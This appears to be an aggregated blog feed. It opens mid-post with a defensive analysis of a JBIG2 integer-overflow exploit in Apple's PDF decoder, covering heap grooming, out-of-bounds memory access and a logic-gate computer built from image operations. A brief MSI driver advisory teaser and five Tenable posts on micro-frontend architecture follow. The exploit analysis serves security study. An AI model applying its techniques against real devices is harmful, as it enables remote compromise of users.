Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

      } else if (seg->getType() == jbig2SegCodeTable) {

        codeTables->append(seg);

      }

    } else {

      error(errSyntaxError, getPos(),

            "Invalid segment reference in JBIG2 text region");

      delete codeTables;

      return;

    }

  }

...

  // get the symbol bitmaps

  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        symbolDict = (JBIG2SymbolDict *)seg;

        for (k = 0; k < symbolDict->getSize(); ++k) {

          syms[kk++] = symbolDict->getBitmap(k); // (4)

        }

      }

    }

  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

Merry Hackmas: multiple vulnerabilities in MSI’s products

By: voidsec
16 December 2021 at 13:46

This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with. All the vulnerabilities are triggered by sending specific IOCTL requests and will allow to: Directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory […]

The post Merry Hackmas: multiple vulnerabilities in MSI’s products appeared first on VoidSec.

1. Introduction: Our Journey Implementing a Micro Frontend

16 December 2021 at 17:08

Introduction: Our Journey Implementing a Micro Frontend

In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.

What This Series is About

While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.

The series is broken up into the following articles:

  • Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
  • Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
  • Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
  • Module Federation — Managing Your Micro-Apps —Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
  • Module Federation — Sharing Vendor Code —Details the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
  • Summary —Reviews everything we discussed and provides some key takeaways from this series.

Who is This For?

If you find yourself in any of the categories below, then this series is for you:

  • You’re an engineer just getting started, but you have a strong interest in architecture.
  • You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
  • You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
  • You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
  • You really just like to read!

In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.

How Articles are Structured

Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.

The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.

Summary

So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.


1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

2. Why We Implemented A Micro Frontend

16 December 2021 at 17:11

Why We Implemented A Micro Frontend

This is post 2 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.

Our Initial Architecture

When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:

  • Design System Repository — This contained all the global components that were used by Tenable.io. For each iteration of a given component, it was published to a Nexus repository (our private npm repository) leveraging Lerna. Package versions were incremented following semver (ex. 1.0.0). Additionally, it also housed a static design system site, which was responsible for documenting the components and how they were to be used.
  • Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.

This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:

The Problem

As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.

Component Isolation

Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.

Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.

Component Bugs & Breaking Changes

We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When this did occur, they were typically jumping between multiple versions at once (ex. 1.0.0 to 1.4.5). When the team discovered a bug, it may have been from one of the versions in between (ex. 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.

Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

One Team Blocks All Others

One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.

Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.

Slow Development

As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.

If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development, but our Jenkins build was also getting slower over time as things grew, because it had to lint, test, and build more and more over time. We employed a number of solutions in an attempt to speed up our build, including: The DLL Plugin, SplitChunksPlugin, Tweaking Our Minification Configuration, etc. However, we began realizing that at a certain point there wasn’t much more we could do and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).

Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.

The Solution

At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:

  • Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
  • Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.

Summary

With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.

As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.


2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

3. Introducing The Monorepo & NX

16 December 2021 at 17:11

Introducing The Monorepo & NX

This is post 3 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.

The Problem

Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how 3rd-party NPM packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.

To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.

The Solution

The Monorepo Is Born

The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:

  • Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
  • Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.

The following diagram shows how we created the new monorepo based on these changes.

It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.

Leveraging NX

In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.

Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.

So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.

This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

At this point, our repository looks something like the structure of defined workspaces below:

Apps

  • design-system — The static site (built off of Gatsby) that documents our global components.
  • tenable-io — Our core application that was already in the repository.

Libs

  • design-system/components — A library that houses our global components.
  • design-system/styles — A library that is responsible for setting up our global theme provider.
  • tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.

To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by n+ applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way if a change has been made that impacts the workspace and we want to build all of them, we can tell NX to run the build target (line 6) for all affected workspaces.

At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.

The Power Of NX

Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.

We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs command with no active changes in our repository. Shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.

Now we will make a slight update to our test-component-1.tsx file (line 19):

If we re-run the affected commands above we see that the following apps/lib are impacted: design-system, tenable-io, and design-system/components:

Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.

With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces:

Summary

Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:

  1. Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
  2. Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.


3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

4. Introducing Module Federation

16 December 2021 at 17:13

Introducing Module Federation

This is post 4 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.

The Problem

Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.

This was problematic for a number of reasons:

  • Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these are good options.
  • Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
  • E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team’s E2E tests fail, it blocks the other team’s changes from making it to production. This was a significant bottleneck for us.

The Solution

Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.

As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.

Workspaces

One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:

  • Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
  • Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
  • Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.

This simple diagram illustrates the relationship between the Host and micro-apps:

Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).

Before (line 5)

After (lines 4–6)

Note: When leveraging module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that’s best for you. This article does a good job in breaking these options down.

Workspace Commands

Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each of the micro-app’s package.json file. This command starts the webpack dev server for each application.

The serve target for host — Kicks off the dev servers for all 3 apps
Dev command for host — Applications 1 & 2 are identical

At this point, if we run nx serve host (serve being one of the targets defined for the host workspace) it will kick off the three commands shown on lines 10–12. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.

Webpack Configuration — Host

The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.

Some items of note include:

  • ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
  • remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
  • shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
  • devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.

Webpack Configuration — Application

The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. In our case, the exposes property of the ModuleFederationPlugin defines what is exposed to the Host application when it goes to import from either of these. This is the exposes property’s purpose: it defines a public API that determines which files are consumable. So in our case, we will only expose the index file (‘.’) in the src directory. You’ll see we’re not defining any remotes, and this is intentional. In our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.

In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:

Initial Load

When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called boostrap.js. This approach avoids the error “Shared module is not available for eager consumption,” which you can read more about here.

The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like a normal component (lines 15–16):

Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:

At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:

Loading The Remotes

To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:

In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.

We know application 1 and 2 are getting built, and they’re being served up at ports 3001 and 3002. So why can’t the Host find them? The issue is because we haven’t actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:

Our host specifies the index.html file
The index.html file is responsible for loading in the remote entries

Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:

Summary

At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:


4. Introducing Module Federation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

5. Module Federation — Managing Your Micro-Apps

16 December 2021 at 17:15

Module Federation — Managing Your Micro-Apps

This is post 5 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

The Problem

When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.

As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.

The Solution

To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

The Serve Command

One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:

You can see in our webpack configuration below where we send the ready message (line 193). The serve command above listens for that message (line 26 above) and uses it to keep track of when a particular micro-app is done compiling.

Remote Utilities

Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, it would return the name of the remotes along with the port they should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.

Putting It All Together

Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above, i.e. it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a host of various engineering needs:

  • Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
  • Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
  • Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
  • All — If we wanted to spin up everything, we could run npm run serve --all.

